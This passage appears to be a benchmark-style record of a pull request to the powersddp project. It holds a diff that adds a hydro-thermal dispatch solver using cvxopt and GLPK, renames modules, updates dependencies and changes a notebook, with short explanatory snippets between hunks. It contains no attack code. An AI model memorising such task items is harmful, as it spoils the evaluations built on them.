+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c9e8e0ce5284ebebe110efd652c164ed6eab77f5de4c3533abc756302ee77765"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:59a78d7066d1c921a77e3306aa0ebf6e55396c097d5dfcc4df8defe3dcecb735"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:132def05e73d292c949b02e7ef873debb77acc44a8b119d215921046f0c3a91d"},
+ {file = "pandas-1.3.2-cp38-cp38-win32.whl", hash = "sha256:69e1b2f5811f46827722fd641fdaeedb26002bd1e504eacc7a8ec36bdc25393e"},
+ {file = "pandas-1.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:7996d311413379136baf0f3cf2a10e331697657c87ced3f17ac7c77f77fe34a3"},
+ {file = "pandas-1.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:1738154049062156429a5cf2fd79a69c9f3fa4f231346a7ec6fd156cd1a9a621"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9cce01f6d655b4add966fcd36c32c5d1fe84628e200626b3f5e2f40db2d16a0f"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1099e2a0cd3a01ec62cca183fc1555833a2d43764950ef8cb5948c8abfc51014"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0cd5776be891331a3e6b425b5abeab9596abea18435c5982191356f9b24ae731"},
+ {file = "pandas-1.3.2-cp39-cp39-win32.whl", hash = "sha256:66a95361b81b4ba04b699ecd2416b0591f40cd1e24c60a8bfe0d19009cfa575a"},
+ {file = "pandas-1.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:89f40e5d21814192802421df809f948247d39ffe171e45fe2ab4abf7bd4279d8"},
+ {file = "pandas-1.3.2.tar.gz", hash = "sha256:cbcb84d63867af3411fa063af3de64902665bb5b3d40b25b2059e40603594e87"},
+]
pandocfilters = [
{file = "pandocfilters-1.4.3.tar.gz", hash = "sha256:bc63fbb50534b4b1f8ebe1860889289e8af94a23bff7445259592df25a3906eb"},
]
@@ -1554,6 +1652,10 @@ pickleshare = [
{file = "pickleshare-0.7.5-py2.py3-none-any.whl", hash = "sha256:9649af414d74d4df115d5d718f82acb59c9d418196b7b4290ed47a12ce62df56"},
{file = "pickleshare-0.7.5.tar.gz", hash = "sha256:87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"},
]
+plotly = [
+ {file = "plotly-5.2.1-py2.py3-none-any.whl", hash = "sha256:bf7c8123541a2c6579c309561a8e1058c129434c67419651efbdc4922b11da8f"},
+ {file = "plotly-5.2.1.tar.gz", hash = "sha256:1575c34f87313818fc109a3d3326f2b91363d049c1e80cbf68561c8df24fb47c"},
+]
pluggy = [
{file = "pluggy-0.13.1-py2.py3-none-any.whl", hash = "sha256:966c145cd83c96502c3c3868f50408687b38434af77734af1e9ca461a4081d2d"},
{file = "pluggy-0.13.1.tar.gz", hash = "sha256:15b2acde666561e1298d71b523007ed7364de07029219b604cf808bfa1c765b0"},
@@ -1769,6 +1871,10 @@ sniffio = [
{file = "sniffio-1.2.0-py3-none-any.whl", hash = "sha256:471b71698eac1c2112a40ce2752bb2f4a4814c22a54a3eed3676bc0f5ca9f663"},
{file = "sniffio-1.2.0.tar.gz", hash = "sha256:c4666eecec1d3f50960c6bdf61ab7bc350648da6c126e3cf6898d8cd4ddcd3de"},
]
+tenacity = [
+ {file = "tenacity-8.0.1-py3-none-any.whl", hash = "sha256:f78f4ea81b0fabc06728c11dc2a8c01277bfc5181b321a4770471902e3eb844a"},
+ {file = "tenacity-8.0.1.tar.gz", hash = "sha256:43242a20e3e73291a28bcbcacfd6e000b02d3857a9a9fff56b297a27afdc932f"},
+]
terminado = [
{file = "terminado-0.11.0-py3-none-any.whl", hash = "sha256:221eef83e6a504894842f7dccfa971ca2e98ec22a8a9118577e5257527674b42"},
{file = "terminado-0.11.0.tar.gz", hash = "sha256:1e01183885f64c1bba3cf89a5a995ad4acfed4e5f00aebcce1bf7f089b0825a1"},
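The hydro balance constraint used throughout the model, $v_f = v_i + afl - v_t - v_v$, reduces to plain arithmetic once a solution is fixed. A minimal check, with illustrative numbers taken from the README payload's first inflow scenario:

```python
# Illustrative only: the hydro balance constraint of the model,
# v_f = v_i + inflow - v_t - v_v, evaluated as plain arithmetic.
v_i, inflow = 60.0, 23.0   # initial volume and inflow (hm3)
v_t, v_v = 50.0, 0.0       # turbined and shed flow (hm3)

v_f = v_i + inflow - v_t - v_v
print(v_f)  # 33.0
```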
diff --git a/powersddp/core/system.py b/powersddp/core/system.py
index d8e72df..69a4181 100644
--- a/powersddp/core/system.py
+++ b/powersddp/core/system.py
@@ -1,59 +1,208 @@
"""Module to handle classes and methods related to a selected Power System.
-This module should follow a systems.json file standar:
-{
- "{name}": {
- "shedding_cost": float,
- "load": [float, float, float],
- "n_disc": int,
- "n_est": int,
- "n_cen": int,
- "generation_units": [
- {"type": "hydro",
- "name": "str",
- "v_max": float,
- "v_min": float,
- "prod": float,
- "flow_max": float,
- "inflow_scenarios":[<list>]},
- {"type": "thermal", "name": "str", "capacity": "float", "cost": float},
- ...
- ]
- }
-}
-Where {name} should be changed to whatever name you may choose to your system.
-For example, 'Test01'. Check README.md file.
+This module should follow a systems.yml file standard:
+
+# system.yml
+load: [float,float,float]
+discretizations: int
+stages: int
+scenarios: int
+outage_cost: float
+hydro-units: !include system-hydro.yml
+thermal-units: !include system-thermal.yml
+
+# system-hydro.yml
+-
+ name: str
+ v_max: float
+ v_min: float
+ prod: float
+ flow_max: float
+ inflow_scenarios:
+ - list<float>
+ - list<float>
+ - list<float>
+
+# system-thermal.yml
+-
+ name: str
+ capacity: float
+ cost: float
"""
-from abc import ABC, abstractclassmethod
+from abc import ABC, abstractmethod
+from itertools import product
+import numpy as np
+import pandas as pd
import yaml
-from powersddp.util._yml import YmlLoader
-
-YmlLoader.add_constructor("!include", YmlLoader.include)
+from powersddp.utils._yml import YmlLoader
+from powersddp.utils._solver import sdp, plot_future_cost_function
class PowerSystemInterface(ABC):
- @abstractclassmethod
+ @abstractmethod
def load_system(self):
raise NotImplementedError
+ @abstractmethod
+ def dispatch(self):
+ raise NotImplementedError
+
class PowerSystem(PowerSystemInterface):
- def __init__(self, verbose: bool = False, **kwargs):
- self.__verbose = verbose
- self.__dict__.update(kwargs)
- self.load_system()
+ """Singleton Class to instantiate a Power System.
- def load_system(self):
- if "path" in self.__dict__:
- with open(self.path, "r") as f:
- data = yaml.load(f, YmlLoader)
-
- self.data = data
- if self.__verbose:
- print("System loaded from {} file".format(self.path))
- elif "data" in self.__dict__:
- if self.__verbose:
- print("System loaded from 'data' payload")
+    A Power System is defined based on a set of parameters, including the system
+    parameters and all the generation units, both thermal and hydro.
+
+ Note: Either initialize a Power System by providing the path to a systems.yml file or
+ by providing a dictionary containing all the necessary data.
+
+ Attributes
+ ----------
+ path : str, optional
+ Path to the systems.yml file
+ data : dict, optional
+ Dictionary containing all of the power system parameters, including the generation units.
+
+ """
+
+ def __init__(self, path: str = None, data: dict = None):
+ """__init__ method.
+
+ Parameters
+ ----------
+ path : str, optional
+ Path to the systems.yml file.
+ data : :obj:`dict`, optional
+            Dictionary containing all of the power system
+            parameters, including the generation units.
+            Ignored when `path` is also supplied, since the
+            file takes priority.
+
+ """
+
+ self.load_system(path=path, data=data)
+
+ def load_system(self, *, path: str = None, data: dict = None):
+ """Loads a Power System from file or dictionary payload
+
+        A Power System can be loaded from either a file or a dictionary payload.
+        In case both keyword parameters are supplied, the file path takes
+        priority and the data payload is ignored.
+
+ PowerSystem loads the data by default during initialization, but can be reloaded ad-hoc.
+
+ Parameters
+ ----------
+ path : str, optional
+ Path to the .yml file containing the system data.
+ data : dict, optional
+ Dictionary containing the structured data of the system.
+
+ """
+ if path:
+ with open(path, "r") as f:
+ self.data = yaml.load(f, YmlLoader)
+ elif data:
+ self.data = data
else:
- raise NotImplementedError
+ raise ValueError(
+ "load_system() should receive path=str or data=dict as arguments"
+ )
+
+ def dispatch(
+ self, *, solver: str = "sdp", plot: bool = False, verbose: bool = False
+ ) -> pd.DataFrame:
+ """Solves a financial dispatch of a Power System class
+
+ Once instantiated a Power System can deploy the generation units based on the
+ minimization of an objective function. This method iterates over every stage
+ and scenario of the Power System, finding the optimal solution of the problem
+ using the Dual Stochastic Dynamic Programming technique.
+
+ Parameters
+ ----------
+ plot : bool, optional
+ Boolean to plot the future cost function of every stage.
+        verbose : bool, optional
+            Boolean to print the solution of every stage and scenario.
+
+ Returns
+ -------
+ operation : pandas.DataFrame
+ A Dataframe containing the operation on every stage and scenario.
+
+ """
+
+ n_hgu = len(self.data["hydro-units"])
+
+ step = 100 / (self.data["discretizations"] - 1)
+ discretizations = list(product(np.arange(0, 100 + step, step), repeat=n_hgu))
+
+ operation = []
+ cuts = [] # type: ignore
+ for stage in range(self.data["stages"], 0, -1):
+ for discretization in discretizations:
+
+ v_i = []
+ # For Every Hydro Unit
+ for i, hgu in enumerate(self.data["hydro-units"]):
+ v_i.append(
+ hgu["v_min"]
+ + (hgu["v_max"] - hgu["v_min"]) * discretization[i] / 100
+ )
+
+ # For Every Scenario
+ average = 0.0
+ avg_water_marginal_cost = [0 for _ in self.data["hydro-units"]]
+ for scenario in range(self.data["scenarios"]):
+ inflow = []
+ for i, hgu in enumerate(self.data["hydro-units"]):
+ inflow.append(hgu["inflow_scenarios"][stage - 1][scenario])
+
+ if verbose:
+ print(
+ "STAGE: {} | DISC.: {}% | SCENARIO: {}".format(
+ stage, int(discretization[0]), scenario
+ )
+ )
+ result = sdp(
+ system_data=self.data,
+ v_i=v_i,
+ inflow=inflow,
+ cuts=cuts,
+ stage=stage + 1,
+ verbose=verbose,
+ )
+ average += result["total_cost"]
+ for i, hgu in enumerate(result["hydro_units"]):
+ avg_water_marginal_cost[i] += hgu["water_marginal_cost"]
+
+ # Calculating the average of the scenarios
+ average = average / self.data["scenarios"]
+ coef_b = average
+ for i, hgu in enumerate(result["hydro_units"]):
+                    # ! Invert the coefficient because the minimization problem inverts the sign
+ avg_water_marginal_cost[i] = (
+ -avg_water_marginal_cost[i] / self.data["scenarios"]
+ )
+ coef_b -= v_i[i] * avg_water_marginal_cost[i]
+
+ cuts.append(
+ {"stage": stage, "coef_b": coef_b, "coefs": avg_water_marginal_cost}
+ )
+ operation.append(
+ {
+ "stage": stage,
+ "storage_percentage": "{}%".format(int(discretization[i])),
+ "initial_volume": v_i[0],
+ "average_cost": round(average, 2),
+ }
+ )
+ operation_df = pd.DataFrame(operation)
+
+ if n_hgu == 1 and plot:
+ plot_future_cost_function(operation=operation_df)
+
+ return operation_df
diff --git a/powersddp/util/__init__.py b/powersddp/utils/__init__.py
similarity index 100%
rename from powersddp/util/__init__.py
rename to powersddp/utils/__init__.py
diff --git a/powersddp/utils/_solver.py b/powersddp/utils/_solver.py
new file mode 100644
index 0000000..a2d597f
--- /dev/null
+++ b/powersddp/utils/_solver.py
@@ -0,0 +1,215 @@
+"""Utilitarian module to solve power systems.
+"""
+
+
+import cvxopt.modeling as model
+import pandas as pd
+import plotly.graph_objects as go
+
+from cvxopt import solvers
+from plotly.subplots import make_subplots
+
+solvers.options["glpk"] = dict(msg_lev="GLP_MSG_OFF")
+
+
+# Unique Linear Programming
+def ulp(
+ system_data: dict,
+ v_i: list,
+ inflow: list,
+ cuts: list,
+ stage: int,
+ verbose: bool = False,
+):
+ """Unique Linear Programming Solver
+
+ Parameters
+ ----------
+ system_data : dict,
+ Dict containing data structured as used to instantiate a PowerSystem.
+    v_i : list
+        List containing the initial volume of each Hydro Unit.
+    inflow : list
+        List containing the inflow to each Hydro Unit.
+    verbose : bool, optional
+        Boolean to print the solution of the optimization problem.
+ """
+
+ return None
+
+
+# Stochastic Dual Programming
+def sdp(
+ system_data: dict,
+ v_i: list,
+ inflow: list,
+ cuts: list,
+ stage: int,
+ verbose: bool = False,
+):
+ """Stochastic Dual Programming Solver
+
+ Method to abstract the Dual Stochastic Programming solver applied to the power system
+ problem.
+
+ Parameters
+ ----------
+ system_data : dict,
+ Dict containing data structured as used to instantiate a PowerSystem.
+    v_i : list
+        List containing the initial volume of each Hydro Unit.
+    inflow : list
+        List containing the inflow to each Hydro Unit.
+    verbose : bool, optional
+        Boolean to print the solution of the optimization problem.
+
+ Returns
+ -------
+ operation : dict
+ A dictionary representing the operation
+ """
+
+ n_tgu = len(system_data["thermal-units"])
+ n_hgu = len(system_data["hydro-units"])
+
+ ## Initializing Model Variables
+ v_f = model.variable(n_hgu, "Final Volume")
+ v_t = model.variable(n_hgu, "Turbined Flow")
+ v_v = model.variable(n_hgu, "Shed Flow")
+ g_t = model.variable(n_tgu, "Power Generated")
+ shortage = model.variable(1, "Power Shortage")
+ alpha = model.variable(1, "Future Cost")
+
+ ## Objective Function
+ objective_function = 0
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ objective_function += tgu["cost"] * g_t[i]
+ objective_function += system_data["outage_cost"] * shortage[0]
+ for i, _ in enumerate(system_data["hydro-units"]):
+ objective_function += 0.01 * v_v[i]
+ objective_function += 1.0 * alpha[0]
+
+ ## Constraints
+ ### Hydro Balance
+ constraints = []
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ constraints.append(v_f[i] == float(v_i[i]) + float(inflow[i]) - v_t[i] - v_v[i])
+
+ ### Load Supply
+ supplying = 0
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ supplying += hgu["prod"] * v_t[i]
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ supplying += g_t[i]
+
+ supplying += shortage[0]
+
+ constraints.append(supplying == system_data["load"][stage - 2])
+
+ ### Bounds
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ constraints.append(v_f[i] >= hgu["v_min"])
+ constraints.append(v_f[i] <= hgu["v_max"])
+ constraints.append(v_t[i] >= 0)
+ constraints.append(v_t[i] <= hgu["flow_max"])
+ constraints.append(v_v[i] >= 0)
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ constraints.append(g_t[i] >= 0)
+ constraints.append(g_t[i] <= tgu["capacity"])
+
+ constraints.append(shortage[0] >= 0)
+ constraints.append(alpha[0] >= 0)
+
+ ### Cut constraint (Future cost function of forward stage)
+ for cut in cuts:
+ if cut["stage"] == stage:
+ equation = 0
+ for hgu in range(n_hgu):
+ equation += float(cut["coefs"][hgu]) * v_f[hgu]
+ equation += float(cut["coef_b"]) # type: ignore
+ constraints.append(alpha[0] >= equation)
+
+ ## Solving
+ opt_problem = model.op(objective=objective_function, constraints=constraints)
+ opt_problem.solve(format="dense", solver="glpk")
+
+ ## Print
+ if verbose:
+ print("--------------------------------------")
+ print("Total Cost: ${}".format(round(objective_function.value()[0], 2))) # type: ignore
+ print("Future Cost: ${}".format(round(alpha[0].value()[0], 2)))
+ print("--------------------------------------")
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_f.name, v_f[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_t.name, v_t[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_v.name, v_v[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} $/hm3".format(
+ i, "Water Cost", constraints[i].multiplier.value[0]
+ )
+ )
+ print("--------------------------------------")
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ print("TGU {} | {}: {:>7.2f} MWmed".format(i, g_t.name, g_t[i].value()[0]))
+ print("--------------------------------------")
+
+ print(
+ """{}: {:.2f} MWmed\nMarginal Cost: {:.2f}\n======================================\n
+ """.format(
+ shortage.name,
+ shortage[0].value()[0],
+ constraints[n_hgu].multiplier.value[0],
+ )
+ )
+
+ return {
+ "shortage": shortage[0].value()[0],
+ "operational_marginal_cost": constraints[n_hgu].multiplier.value[0],
+ "total_cost": objective_function.value()[0], # type: ignore
+ "future_cost": alpha[0].value()[0],
+ "hydro_units": [
+ {
+ "v_f": v_f[i].value()[0],
+ "v_t": v_t[i].value()[0],
+ "v_v": v_v[i].value()[0],
+ "water_marginal_cost": constraints[i].multiplier.value[0],
+ }
+ for i in range(n_hgu)
+ ],
+ "thermal_units": [{"g_t": g_t[i].value()[0]} for i in range(n_tgu)],
+ }
+
+
+def plot_future_cost_function(operation: pd.DataFrame):
+
+ n_stages = len(operation["stage"].unique())
+
+ fig = make_subplots(rows=n_stages, cols=1)
+
+ for i, stage in enumerate(operation["stage"].unique()):
+ stage_df = operation.loc[operation["stage"] == stage]
+ fig.add_trace(
+ go.Scatter(
+ x=stage_df["initial_volume"],
+ y=stage_df["average_cost"],
+ mode="lines",
+ name="Stage {}".format(stage),
+ ),
+ row=i + 1,
+ col=1,
+ )
+
+ fig.update_xaxes(title_text="Final Volume [hm3]")
+ fig.update_yaxes(title_text="$/MW")
+
+ fig.update_layout(height=300 * n_stages, title_text="Future Cost Function")
+ fig.show()
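The cut constraint added to the solver above ($\alpha \geq b^{s} + \sum a_i^{s} \cdot v_f(i)$) implies that the future cost is the maximum over the active cuts. A self-contained sketch (illustrative only; `future_cost` is not part of the module, but the cut dictionaries follow the shape built in `PowerSystem.dispatch()`):

```python
# Illustrative sketch, not part of powersddp: evaluate the future cost
# alpha = max over cuts of (coef_b + sum(coefs_i * v_f_i)).

def future_cost(v_f, cuts, stage):
    values = [
        cut["coef_b"] + sum(a * v for a, v in zip(cut["coefs"], v_f))
        for cut in cuts
        if cut["stage"] == stage
    ]
    return max(values, default=0.0)  # alpha >= 0 when no cut applies

cuts = [
    {"stage": 2, "coef_b": 60.0, "coefs": [-0.25]},
    {"stage": 2, "coef_b": 90.0, "coefs": [-1.0]},
]
print(future_cost([60.0], cuts, stage=2))  # max(60 - 15, 90 - 60) = 45.0
```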
diff --git a/powersddp/util/_yml.py b/powersddp/utils/_yml.py
similarity index 62%
rename from powersddp/util/_yml.py
rename to powersddp/utils/_yml.py
index b0b21b8..72f1c7a 100644
--- a/powersddp/util/_yml.py
+++ b/powersddp/utils/_yml.py
@@ -1,8 +1,17 @@
+"""Utilitarian module to deal with .yml files
+"""
+
import yaml
import os
class YmlLoader(yaml.SafeLoader):
+ """Class to extend yaml loader capabilities
+
+ Attributes
+ ----------
+ """
+
def __init__(self, stream):
self._root = os.path.split(stream.name)[0]
@@ -11,7 +20,10 @@ def __init__(self, stream):
def include(self, node):
- filename = os.path.join(self._root, self.construct_scalar(node))
+ filename = os.path.join(self._root, self.construct_scalar(node)) # type: ignore
with open(filename, "r") as f:
return yaml.load(f, YmlLoader)
+
+
+YmlLoader.add_constructor("!include", YmlLoader.include)
diff --git a/pyproject.toml b/pyproject.toml
index 31928aa..df3a553 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -12,6 +12,9 @@ exclude = ["Makefile","README.rst","Notebook.ipynb"]
python = "^3.8"
PyYAML = "^5.4.1"
cvxopt = "^1.2.6"
+numpy = "^1.21.1"
+pandas = "^1.3.2"
+plotly = "^5.2.1"
[tool.poetry.dev-dependencies]
pytest = "^5.2"
| Feature 04 dispatch finished
## Comments
> Closes #4
First release feature.
Power System dispatches correctly for a single Hydro Unit and multiple Thermal Units
| 2021-08-22T22:49:13 | 0.0 | [] | [] |
|||
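The volume-discretization grid that `dispatch()` iterates over can be reproduced in a few lines. The numbers below follow the README payload (3 discretizations), while `n_hgu = 2` is a hypothetical two-unit case to show the combination step:

```python
# Sketch of the volume-discretization grid used by PowerSystem.dispatch():
# evenly spaced percentage levels, combined across hydro units with product().
from itertools import product

import numpy as np

discretizations = 3  # as in the README payload
n_hgu = 2            # hypothetical: two hydro units

step = 100 / (discretizations - 1)
levels = np.arange(0, 100 + step, step)     # array([  0.,  50., 100.])
grid = list(product(levels, repeat=n_hgu))  # 3 ** 2 = 9 combinations
print(len(grid))  # 9
```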
ettoreaquino/powersddp | ettoreaquino__powersddp-6 | 72449e1235b803e5162629753fbad01de98fb6e3 | diff --git a/Notebook.ipynb b/Notebook.ipynb
index 18782e2..1eb6b54 100644
--- a/Notebook.ipynb
+++ b/Notebook.ipynb
@@ -2,27 +2,19 @@
"cells": [
{
"cell_type": "code",
- "execution_count": 1,
+ "execution_count": 2,
"id": "9dd8e6a5-b075-404b-85eb-6131fcca2a2a",
"metadata": {},
- "outputs": [
- {
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System loaded from system.yml file\n"
- ]
- }
- ],
+ "outputs": [],
"source": [
- "from powersddp.system import PowerSystem\n",
- "import cvxopt.modeling as model\n",
+ "import powersddp as psddp\n",
"\n",
- "data = {'load': [50, 50, 50],\n",
+ "\n",
+ "data = {'load': [100, 15, 50],\n",
" 'discretizations': 3,\n",
" 'stages': 3,\n",
" 'scenarios': 2,\n",
- " 'shedding_cost': 500,\n",
+ " 'outage_cost': 500,\n",
" 'hydro-units': [{'name': 'HU1',\n",
" 'v_max': 100,\n",
" 'v_min': 20,\n",
@@ -32,7 +24,20 @@
" 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
" {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
"\n",
- "TestSystem = PowerSystem(path='system.yml')"
+ "TestSystem = psddp.PowerSystem(data=data)"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 6,
+ "id": "0b41801a-dc45-4777-a2ec-1294c91890cc",
+ "metadata": {
+ "scrolled": true,
+ "tags": []
+ },
+ "outputs": [],
+ "source": [
+ "operation = TestSystem.dispatch()"
]
},
{
@@ -66,7 +71,7 @@
" \\begin{aligned}\n",
" \\min \\quad & C_1\\cdot g_{t_1} + C_2\\cdot g_{t_2} + C_{def}\\cdot def + 0.01\\cdot v_v\\\\\n",
" \\textrm{s.t.} \\quad & \\\\\n",
- " \\textrm{hydro balance} \\quad & v_f = v_i + afl - v_t \\\\\n",
+    "    \\textrm{hydro balance} \\quad & v_f(i) = v_i(i) + afl(i) - v_t(i) - v_v(i) \\\\\n",
" \\textrm{load supplying} \\quad & \\rho\\cdot v_t + g_{t_1} + g_{t_2} + def = \\textrm{load}\\\\\n",
" \\textrm{constraints} \\quad & \\\\\n",
" & v_{f_{min}}\\leq v_f \\leq v_{f_{max}}\\\\\n",
@@ -83,15 +88,24 @@
},
{
"cell_type": "code",
- "execution_count": 4,
+ "execution_count": 16,
"id": "ccbf3a14-01ed-4942-acb3-a4c64f47b6fd",
"metadata": {},
"outputs": [],
"source": [
- "def dispatch(system, v_i, inflow):\n",
+ "import cvxopt.modeling as model\n",
+ "from cvxopt import solvers\n",
+ "\n",
+ "import pandas as pd\n",
+ "import plotly.graph_objects as go\n",
+ "from plotly.subplots import make_subplots\n",
+ "\n",
+ "solvers.options['glpk'] = dict(msg_lev='GLP_MSG_OFF')\n",
+ "\n",
+ "def dispatch(system, v_i, inflow, cuts, stage, verbose:bool=False):\n",
" n_tgu = len(system.data['thermal-units'])\n",
" n_hgu = len(system.data['hydro-units'])\n",
- "\n",
+ " solvers.options['show_progress'] = verbose\n",
"\n",
" ## Initializing Model Variables\n",
" v_f = model.variable(n_hgu, \"Final Volume of the Hydro Unit\")\n",
@@ -99,6 +113,7 @@
" v_v = model.variable(n_hgu, \"Shed flow of the Hydro Unit\")\n",
" g_t = model.variable(n_tgu, \"Power generated by the Thermal Unit\")\n",
" deficit = model.variable(1, \"Power deficit\")\n",
+ " alpha = model.variable(1, \"Future Cost\")\n",
"\n",
" ## Objective Function\n",
" fob = 0\n",
@@ -107,14 +122,17 @@
     "    fob += system.data['outage_cost']*deficit[0]\n",
" for i, _ in enumerate(system.data['hydro-units']):\n",
" fob += 0.01*v_v[i]\n",
+ " fob += 1.0 * alpha[0]\n",
"\n",
- " ## Hydro Balance\n",
+ " ## Constraints\n",
+ " \n",
+ " ### Hydro Balance\n",
" constraints = []\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
- " constraints.append( v_f[i] == v_i + inflow - v_t[i] - v_v[i] )\n",
+ " constraints.append( v_f[i] == float(v_i[i]) + float(inflow[i]) - v_t[i] - v_v[i] )\n",
"\n",
" supplying = 0\n",
- " ## Load Supplying\n",
+ " ### Load Supply\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
" supplying += hgu[\"prod\"] * v_t[i]\n",
"\n",
@@ -123,9 +141,10 @@
"\n",
" supplying += deficit[0]\n",
"\n",
- " constraints.append(supplying == system.data['load'][2])\n",
+ " constraints.append(supplying == system.data['load'][stage-2])\n",
+ " \n",
"\n",
- " ## Constraints\n",
+ " ### Bounds\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
" constraints.append(v_f[i] >= hgu[\"v_min\"])\n",
" constraints.append(v_f[i] <= hgu[\"v_max\"])\n",
@@ -138,152 +157,1341 @@
" constraints.append(g_t[i] <= tgu[\"capacity\"])\n",
"\n",
" constraints.append(deficit[0] >= 0)\n",
+ " constraints.append(alpha[0] >= 0)\n",
" \n",
+ " ### Cut constraint (Future cost function of forward stage)\n",
+ " for cut in cuts:\n",
+ " if cut['stage'] == stage:\n",
+ " equation = 0\n",
+ " for hgu in range(n_hgu):\n",
+ " equation += float(cut['coefs'][hgu])*v_f[hgu]\n",
+ " equation += float(cut['coef_b'])\n",
+ " constraints.append(alpha[0] >= equation)\n",
+ " \n",
+ " ## Solving\n",
" opt_problem = model.op(objective=fob, constraints=constraints)\n",
" opt_problem.solve(format='dense',solver='glpk')\n",
"\n",
- " print(\"Total Cost: {}\".format(fob.value()))\n",
+ " ## Print\n",
+ " if verbose:\n",
+ " print(\"Total Cost: {}\".format(fob.value()))\n",
"\n",
- " for i, hgu in enumerate(system.data['hydro-units']):\n",
- " print(\"{} {} is {} hm3\".format(v_f.name,i,v_f[i].value()))\n",
- " print(\"{} {} is {} hm3\".format(v_t.name,i,v_t[i].value()))\n",
- " print(\"{} {} is {} hm3\".format(v_v.name,i,v_v[i].value()))\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"{} {} is {} hm3\".format(v_f.name,i,v_f[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_t.name,i,v_t[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_v.name,i,v_v[i].value()))\n",
"\n",
- " for i, tgu in enumerate(system.data['thermal-units']):\n",
- " print(\"{} {} is {} MWmed\".format(g_t.name,i,g_t[i].value()))\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " print(\"{} {} is {} MWmed\".format(g_t.name,i,g_t[i].value()))\n",
"\n",
- " print(\"{} is {} MWmed\".format(deficit.name,deficit[0].value()))\n",
+ " print(\"{} is {} MWmed\".format(deficit.name,deficit[0].value()))\n",
"\n",
- " for i, hgu in enumerate(system.data['hydro-units']):\n",
- " print(\"The cost of water at Hydro Unit {} is {} hm3\".format(i,constraints[i].multiplier.value))\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"The cost of water at Hydro Unit {} is {} hm3\".format(i,constraints[i].multiplier.value))\n",
"\n",
- " print(\"The Marginal Cost is: {}\".format(constraints[n_hgu].multiplier.value))"
- ]
- },
- {
- "cell_type": "code",
- "execution_count": 5,
- "id": "17fb0a0c-5a87-41fb-a645-1434a65c02d4",
- "metadata": {},
- "outputs": [
- {
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "Total Cost: [ 7.67e+03]\n",
- "\n",
- "Final Volume of the Hydro Unit 0 is [ 2.00e+01]\n",
- " hm3\n",
- "Turbined Flow of the Hydro Unit 0 is [ 1.10e+01]\n",
- " hm3\n",
- "Shed flow of the Hydro Unit 0 is [ 0.00e+00]\n",
- " hm3\n",
- "Power generated by the Thermal Unit 0 is [ 1.50e+01]\n",
- " MWmed\n",
- "Power generated by the Thermal Unit 1 is [ 1.00e+01]\n",
- " MWmed\n",
- "Power deficit is [ 1.45e+01]\n",
- " MWmed\n",
- "The cost of water at Hydro Unit 0 is [ 4.75e+02]\n",
- " hm3\n",
- "The Marginal Cost is: [-5.00e+02]\n",
- "\n",
- "GLPK Simplex Optimizer, v4.65\n",
- "12 rows, 6 columns, 17 non-zeros\n",
- " 0: obj = 0.000000000e+00 inf = 1.010e+02 (3)\n",
- " 5: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
- "* 6: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
- "OPTIMAL LP SOLUTION FOUND\n"
- ]
- }
- ],
- "source": [
- "system = TestSystem\n",
- "v_i = 20\n",
- "inflow = 11\n",
+ " print(\"The Marginal Cost is: {}\".format(constraints[n_hgu].multiplier.value))\n",
+ " \n",
+ " return {\n",
+ " \"deficit\": deficit[0].value()[0],\n",
+ " \"operational_marginal_cost\": constraints[n_hgu].multiplier.value[0],\n",
+ " \"total_cost\": fob.value()[0],\n",
+ " \"future_cost\": alpha[0].value()[0],\n",
+ " \"hydro_units\": [{\n",
+ " \"v_f\": v_f[i].value()[0],\n",
+ " \"v_t\": v_t[i].value()[0],\n",
+ " \"v_v\": v_v[i].value()[0],\n",
+ " \"water_marginal_cost\": constraints[i].multiplier.value[0]} for i in range(n_hgu)],\n",
+ " \"thermal_units\": [{\"g_t\": g_t[i].value()[0]} for i in range(n_tgu)]\n",
+ " }\n",
+ "\n",
+ "def plot_future_cost_function(operation: pd.DataFrame):\n",
+ " \n",
